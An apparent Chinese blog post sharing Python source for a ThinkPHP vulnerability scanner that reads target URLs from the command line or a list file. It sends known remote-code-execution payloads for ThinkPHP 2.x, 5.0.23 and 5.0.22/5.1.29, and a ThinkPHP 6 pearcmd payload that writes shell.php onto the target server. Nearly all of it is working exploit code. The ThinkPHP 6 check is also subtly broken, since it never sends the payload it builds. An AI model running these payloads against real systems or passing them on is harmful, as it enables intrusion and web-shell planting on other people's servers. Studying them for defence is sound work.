本文最后更新于 420 天前,其中的信息可能已经有所发展或是发生改变。
代码
#!/usr/bin/python
import argparse
import datetime
import rich
import sys
import tp_print as rprint
from tp_scan import start_scan
def get_time():
return datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="ThinkPHP 漏扫")
parser.add_argument('-url', '--url', type=str, help='请输入目标 url')
parser.add_argument('-file', '--file', type=str, help='请指定待检测的 url 列表文件')
args = parser.parse_args()
if '-url' in sys.argv:
rprint.info(get_time(),"thinkphp vulnerable scan start ... ")
start_scan(args.url)
rprint.info(get_time(), "thinkphp vulnerable scan end ... ")
elif '-file' in sys.argv:
file = open(args.file, "r")
rprint.info(get_time(), "thinkphp vulnerable scan start ... ")
for url in file:
start_scan(url)
rprint.info(get_time(), "thinkphp vulnerable scan end ... ")from rich import print as rprint
def error(date, body):
rprint("[[bold green]" + date + "[/bold green]] [[bold red]Error[/bold red]] > [bold yellow]" + body + "[/bold yellow]")
def success(date, body):
rprint("[[bold green]" + date + "[/bold green]] [[bold green]Success[/bold green]] > " + body)
def info(date, body):
rprint("[[bold green]" + date + "[/bold green]] [[bold blue]Info[/bold blue]] > " + body)
import datetime
import requests
from urllib.parse import urljoin
import tp_print as rprint
def get_time():
return datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
class tp_scan:
def __init__(self) -> None:
pass
def thinkphp2_rce(self, url):
result = {
'name':'thinkphp 2x RCE',
'vulnerable':False
}
try:
payload = '?s=/a/b/c/${var_dump(md5(123456))}'
url = urljoin(url, payload)
response = requests.get(url)
if 'e10adc3949ba59abbe56e057f20f883e' in response.text:
result['vulnerable'] = True
result['method'] = 'GET'
result['url'] = url
result['payload'] = payload
return result
else:
return result
except:
return result
def thinkphp_5023_rce(self, url):
result = {
'name':'thinkphp 5.0.23 RCE',
'vulnerable':False,
}
payload = {
'_method': '__construct',
'filter[]': 'phpinfo',
'method': 'get',
'server[REQUEST_METHOD]': '1'
}
try:
suburl = '/index.php?s=captcha'
url = urljoin(url, suburl)
response = requests.post(url, data=payload, verify=False)
if 'PHP Version' in response.text:
result['vulnerable'] = True
result['method'] = 'POST'
result['url'] = url
result['payload'] = payload
return result
else:
return result
except:
return result
def thinkphp_5x_rce(self, url):
result = {
'name':'thinkphp 5.0.22/5.1.29 RCE',
'vulnerable':False
}
try:
payload = r'/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=123456'
url = urljoin(url, payload)
response = requests.get(url)
print(response.text)
if 'e10adc3949ba59abbe56e057f20f883e' in response.text:
result['vulnerable'] = True
result['method'] = 'GET'
result['url'] = url
result['payload'] = payload
return result
else:
return result
except:
return result
def thinkphp_6x_langrce(self, url):
result = {
'name':'thinkphp 6 lang local file inclusion',
'vulnerable':False
}
try:
payload = r'/index.php?+config-create+/&lang=../../../../../../../../../usr/local/lib/php/pearcmd&/%3C?=phpinfo()?%3E+shell.php'
url = urljoin(url, payload)
url2 = urljoin(url, 'shell.php')
response2 = requests.get(url2)
if response2.status_code == 200:
result['vulnerable'] = True
result['method'] = 'GET'
result['url'] = url2
result['payload'] = payload
return result
else:
return result
except:
return result
def start_scan(url):
ts = tp_scan()
scan = ts.thinkphp2_rce(url)
rprint.info(get_time(), scan['name'] + str(' ' + str(scan['vulnerable'])))
scan = ts.thinkphp_5023_rce(url)
rprint.info(get_time(), scan['name'] + str(' ' + str(scan['vulnerable'])))
scan = ts.thinkphp_5x_rce(url)
rprint.info(get_time(), scan['name'] + str(' ' + str(scan['vulnerable'])))
scan = ts.thinkphp_6x_langrce(url)
rprint.info(get_time(), scan['name'] + str(' ' + str(scan['vulnerable'])))效果
